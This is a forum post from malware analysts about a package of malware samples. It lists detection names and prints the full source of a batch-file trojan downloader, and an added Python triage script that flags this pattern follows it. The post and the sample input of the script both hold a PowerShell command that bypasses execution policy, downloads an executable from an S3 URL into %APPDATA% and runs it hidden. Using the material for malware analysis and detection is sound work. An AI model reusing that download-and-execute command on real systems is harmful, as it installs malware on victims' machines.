ikolor wrote: Next ..
No I do not have it.
https://www.virustotal.com/en/file/7dba ... /analysis/
https://www.virustotal.com/en/file/ccd3 ... 467829542/
t3.exe - Ransom/Falock
complaint65648.pdf.bat - PowerShell/Ploprolo (trojan downloader)
email.exe - MSIL/Silog (PWS)
ewinoz.exe - MSIL/Silog (PWS)
updater.exe - MSIL/Noancooe
From my point of view, the most interesting thing in this package of complete crapware (even by malware standards) is Ploprolo:
Code:
@ECHO OFF
start /min
REM QBFC Project Options Begin
REM HasVersionInfo: Yes
REM Companyname: Tbfdgrsbnfouhdfbvifdb LLC
REM Productname: ifnbfdnibdfbijdfn
REM Filedescription:
REM Copyrights: Copyright 2013. All Rights Reserved. vojnfdjbnijdfbnidf LLC
REM Trademarks:
REM Originalname:
REM Comments:
REM Productversion: 1. 3. 1. 2
REM Fileversion: 1. 3. 0. 2
REM Internalname:
REM Appicon:
REM AdministratorManifest: No
REM QBFC Project Options End
@echo off
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-west-1.amazonaws.com/docs.pdf/t4.exe','%APPDATA%\winstrt.exe'); cmd /c '%APPDATA%\winstrt.exe'
So this zoo has been moved to a dedicated thread.
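
Added example, not part of the original post: a small static triage pass for batch files that follow the Ploprolo pattern quoted above (PowerShell started with policy bypass and a hidden window, `DownloadFile` into a user-writable path, then execution of the dropped file). The function name, field names and the list of user-writable prefixes are this example's own assumptions; the sample input is three lines taken from the posted script.

```python
import re

# Heuristics for the downloader pattern in the posted script (names are this example's own).
FLAG_PATTERNS = {
    "policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep|exec)\s+bypass", re.I),
    "no_profile": re.compile(r"-(?:noprofile|nop)\b", re.I),
    "hidden_window": re.compile(r"-(?:windowstyle|w)\s+hidden", re.I),
}
DOWNLOAD_RE = re.compile(
    r"\.DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dest>[^']+)'\s*\)", re.I)
# Assumed list of per-user writable locations worth flagging as drop paths.
USER_WRITABLE = ("%appdata%", "%temp%", "%tmp%", "%localappdata%", "%public%")


def triage_batch(text):
    """Return one finding per line that invokes PowerShell to fetch a file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.upper().startswith(("REM ", "::")):
            continue  # batch comments, e.g. the QBFC project options header
        if "powershell" not in stripped.lower():
            continue
        m = DOWNLOAD_RE.search(stripped)
        if not m:
            continue
        dest = m.group("dest")
        rest = stripped[m.end():]  # whatever follows the download call
        findings.append({
            "line": lineno,
            "flags": sorted(k for k, p in FLAG_PATTERNS.items() if p.search(stripped)),
            "url": m.group("url"),
            "dest": dest,
            "user_writable_dest": dest.lower().startswith(USER_WRITABLE),
            "runs_download": dest.lower() in rest.lower(),
        })
    return findings


# Sample input: three lines taken from the script quoted in the post above.
SAMPLE = r"""@ECHO OFF
REM QBFC Project Options Begin
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-west-1.amazonaws.com/docs.pdf/t4.exe','%APPDATA%\winstrt.exe'); cmd /c '%APPDATA%\winstrt.exe'
"""

if __name__ == "__main__":
    for finding in triage_batch(SAMPLE):
        print(finding)
```

A finding with all three flags set, a user-writable destination and `runs_download` true is the full download-and-execute chain seen in this sample; any one of these on its own is much weaker evidence.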